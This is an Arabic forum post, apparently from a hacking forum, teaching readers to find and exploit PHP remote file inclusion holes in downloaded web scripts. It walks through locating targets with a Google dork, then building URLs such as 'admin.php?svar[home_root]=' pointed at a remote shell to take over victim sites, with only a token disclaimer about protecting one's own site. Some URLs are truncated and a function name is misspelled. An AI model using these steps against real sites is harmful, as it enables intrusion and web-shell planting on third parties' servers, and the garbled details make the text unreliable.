Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: كيف تكتشف ثغره
Anonymous

Date:
كيف تكتشف ثغره
Permalink   
 




طبعا حبيت افيد الاعضاء وانمى قدراتهم فكتبت هذا الموضوع الذى أتمنى ان يحوز أعجابكم
اولا أحب أوجه الشكر لاخى وحبيبى the-wolf-ksaلانى فكرة الموضوع مقتبسه منه وكمان اوجه الشكر لاخى التركى من فريقturkish team وهوsulu kluverter
يلا نبدأ الشرح
اولا لكى تكتشف الثغرات بنفسك عليك ان تكون فاهم شوى فى لغة البى اتش بى ولكن حبيبت اسهل المهمة وهى كالاتى:
اولا لازم تنزل اسكربت من اى موقع اسكربتات وبعدين تفحصه ببرنامج اسمهjaascois x code
طبعا فى ناس ما تعرف يعنى ايه سكربت
الاسكربت بكل بساطه عباره عن برنامج يتم تركيبه فى موقع او منتدى ليعطى الموقع بعض المميزات
طبعا انا جبتلكم شوية مواقع اسكربتات تنزل منها مباشرة

اضغط هنا
كمان
اضغط هنا
كمان واحد عشان الحبايب
اضغط هنا
طبعا بعد ما تحمل الاسكربت على جهازك قم بالاتى:
طبعا هذه وصلة البرنامج اللى هنستخدمه:
اضغط هنا


طبعا زى ما انتم شايفين هذه هى الثغرات المصاب بها الاسكربت وهى فايل انكلود

طبعا ناخذ اى ثغره ونفتحهاكما هو موجود
الان نأتى للخطوة المهمه وهى كيف تكون الاستغلال بطريقة صحيحة:
نفرض ان موقع اسمه
www.site.comووجدنا به الاسكربت اللى اسمهnews طبعا بعد ما عملت بحث فى جوجل بهذا الكود
كود PHP:


inurl:news 

الان نطبق الثغرة على الموقع كالاتى:
فى الصورة الاخيرة العبارة التى تحتها خط نضعها بعد رابط الموقع ليصبح كالاتى
http://www.site.com/news/admin/eintr...eisvhalten.php
نضع علامة استفهام بعد هذا الرابط
http://www.site.com/news/admin/eintr...isvhalten.php?
لاحظ بعد ذلك العلامة $ وهى ما بعدها هو المتغير يعنى ما بعدها هو الرابط الذى سأربط الموقع باى رابط وليكن الشل
نضع ما بعد $ فى الرابط بهذه الطريقة
http://www.site.com/news/admin/eintr...=www.shell.com
طبعا بعد علامة = ضع رابط الشل
نأخذ مثال كما عشان نوضح الصورة اكتر
نفرض اسكربت اسمه web_newsوبعد ما سوين سكان بالبرنامج نقوم بالتطبيق اللى فوق
مثلا:
showit_v2.0\showit\admin\admin.php
showit_v2.0\showit\admin\admin.php?
$svar['home_root'].'/".svar['showit_root'}."/modules/settings.form.inc.php
الاستغلال
http://www.vicivicisite.com/showit_v...admin.php?svar[home_root]=http//shelurl?
اتمنى ان اكون قد وفقت فى الشرح
أرجو الاستخدام من اجل حماية موقعك لا للاستخدام السىء اللهم بلغت اللهم

 

طلب المتغير ولم يوجد اغلاق للمتغير تعتبر ثغرة فايل انكلود
بالنسبة لدوال المسببة لثغرات الفايل انكلود اربعة وهيآ


include
include once
requir
requir once
وانشاءاللة كل شئ واضح وتحياتي لكم


 
 
فأشهد






 



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard